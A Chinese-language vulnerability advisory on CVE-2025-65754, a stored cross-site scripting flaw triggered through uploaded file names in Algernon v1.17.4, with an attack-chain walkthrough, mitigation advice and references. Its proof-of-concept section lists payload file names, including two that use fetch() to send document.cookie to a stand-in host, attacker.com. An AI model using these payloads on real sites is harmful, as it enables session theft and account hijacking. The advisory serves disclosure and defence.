CVE-2025-65754 CVSS 6.1 中危

CVE-2025-65754 Algernon v1.17.4跨站脚本漏洞

披露日期: 2025-12-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-65754

漏洞类型

XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Algernon

漏洞概述

CVE-2025-65754是Algernon应用程序中的一个存储型跨站脚本（Stored XSS）漏洞，影响版本为v1.17.4。该漏洞允许攻击者通过在文件名中注入恶意JavaScript代码，当其他用户访问或下载包含该恶意文件名的资源时，恶意脚本将在受害者浏览器中执行。攻击者可以利用此漏洞窃取用户会话Cookie、劫持用户账户、执行钓鱼攻击或传播恶意软件。由于该漏洞需要用户交互才能触发（用户需要访问或下载包含恶意文件名的资源），因此CVSS评分相对较低，但仍然对应用程序安全性构成威胁。建议受影响的用户尽快升级到最新版本或应用官方提供的安全补丁。

技术细节

该漏洞存在于Algernon处理文件上传和文件名的逻辑中。攻击者可以在上传文件时将恶意JavaScript代码嵌入到文件名中，由于应用程序未对文件名进行充分的输入验证和输出编码，恶意文件名被存储在服务器端。当其他用户通过Web界面访问文件列表或下载文件时，浏览器会解析并执行文件名中包含的恶意脚本代码。攻击者可以利用此漏洞绕过同源策略限制，窃取用户的认证令牌、Session ID或其他敏感信息。漏洞的利用需要攻击者具备文件上传权限，但无需高级权限即可实施攻击。建议在文件上传和显示环节对文件名进行严格的输入验证和HTML实体编码。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标Algernon v1.17.4版本，确认文件上传功能点

STEP 2

Weaponization

攻击者构造包含XSS payload的恶意文件名，如<script>alert(document.cookie)</script>.txt

STEP 3

Delivery

攻击者通过文件上传功能上传带有恶意文件名的文件到服务器

STEP 4

Exploitation

当受害用户访问文件列表或下载文件时，浏览器解析并执行文件名中的恶意脚本

STEP 5

Actions on Objective

攻击者成功窃取用户会话Cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-65754 PoC - Stored XSS in Algernon filename
// Upload a file with malicious filename containing XSS payload
// When other users view the file, the XSS will be executed

// Example malicious filename:
// <script>alert(document.cookie)</script>.txt
// <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>
// <svg/onload=fetch('http://attacker.com?data='+btoa(document.cookie))>

// Attack scenario:
// 1. Attacker uploads file with XSS payload in filename
// 2. Server stores the file with unsanitized filename
// 3. Victim accesses file listing or downloads the file
// 4. Victim's browser executes the injected JavaScript
// 5. Attacker steals session cookies or performs actions on behalf of victim

影响范围

Algernon v1.17.4

防御指南

临时缓解措施

在文件上传功能中添加文件名验证逻辑，禁止包含HTML、JavaScript标签或特殊字符的文件名。对所有文件名进行HTML实体编码（HTML entities encoding）后再在Web界面中显示。临时禁用文件上传功能或限制上传文件类型和大小。建议配置严格的Content-Security-Policy头部限制内联脚本执行。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65754
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65754
3 Details https://www.cvedetails.com/cve/CVE-2025-65754/
4 VulDB https://vuldb.com/cve/CVE-2025-65754
5 Link https://gist.github.com/Bnyt7/0faa90ff93c5d98093a0e29a1eb34d81
6 Link https://github.com/Bnyt7/CVE-2025-65754
7 Link https://github.com/xyproto/algernon
8 Link https://gist.github.com/Bnyt7/0faa90ff93c5d98093a0e29a1eb34d81
9 Link https://github.com/Bnyt7/CVE-2025-65754

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表